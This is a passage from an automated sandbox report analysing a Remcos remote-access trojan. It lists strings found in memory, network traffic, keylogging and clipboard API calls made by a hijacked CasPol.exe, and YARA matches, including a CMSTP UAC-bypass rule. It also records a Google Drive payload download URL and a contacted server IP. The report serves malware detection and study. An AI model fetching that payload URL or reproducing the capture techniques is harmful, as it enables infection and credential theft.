                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: powershell.exe, 0000000B.00000002.456616476.0000000003529000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
                  Source: powershell.exe, 0000000B.00000002.455991013.0000000002501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.589694416.0000000002528000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.515289278.0000000002501000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: CasPol.exe, CasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
                  Source: CasPol.exe, CasPol.exe, 00000018.00000002.527291764.0000000000459000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.com
                  Source: CasPol.exe, 00000018.00000002.527037105.000000000019C000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.com/y
                  Source: CasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                  Source: CasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://www.msn.com/
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://www.msn.com/?ocid=iehp
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://www.msn.com/advertisement.ad.js
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
                  Source: CasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
                  Source: CasPol.exe, 00000016.00000002.531106226.0000000000384000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net8E
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: https://contextual.media.net/
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                  Source: powershell.exe, 0000000B.00000002.456616476.0000000003529000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 0000000B.00000002.456616476.0000000003529000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 0000000B.00000002.456616476.0000000003529000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: powershell.exe, 00000013.00000002.515289278.0000000002639000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
                  Source: powershell.exe, 00000013.00000002.515289278.0000000002639000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
                  Source: powershell.exe, 00000013.00000002.515289278.0000000002758000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
                  Source: powershell.exe, 00000013.00000002.515289278.0000000002758000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                  Source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/dahall/taskscheduler
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                  Source: CasPol.exe String found in binary or memory: https://login.yahoo.com/config/login
                  Source: powershell.exe, 0000000B.00000002.456616476.0000000003529000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: CasPol.exe, 00000016.00000002.531817073.0000000001D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.google
                  Source: CasPol.exe, 00000016.00000002.531960219.0000000002A60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                  Source: CasPol.exe, CasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
                  Source: CasPol.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: bhv2D0A.tmp.22.dr String found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                  Source: unknown Network traffic detected: HTTP traffic on port 49161 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 49163 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
                  Source: unknown Network traffic detected: HTTP traffic on port 49162 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 49164 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
                  Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49164
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49163
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49162
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49161
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
                  Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443
                  Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49161 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000,20_2_0040A2F3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,20_2_0040B749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,20_2_004168FC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,22_2_0040987A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,22_2_004098E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,23_2_00406DFC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,23_2_00406E9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 24_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,24_2_004068B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 24_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,24_2_004072B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,20_2_0040B749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,20_2_0040A41B
                  Source: C:\Windows\SysWOW64\mshta.exe Window created: window name: CLIPBRDWNDCLASS
                  Source: Yara match File source: 20.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 20.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: powershell.exe PID: 2924, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3608, type: MEMORYSTR

                  E-Banking Fraud

                  Source: Yara match File source: 20.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 20.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: powershell.exe PID: 2924, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3608, type: MEMORYSTR
                  Source: Yara match File source: C:\Users\user\AppData\Local\Temp\wordse\logs.dat, type: DROPPED

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0041CA73 SystemParametersInfoW,20_2_0041CA73

                  System Summary

                  Source: 20.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 20.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 20.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 20.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 20.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 20.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
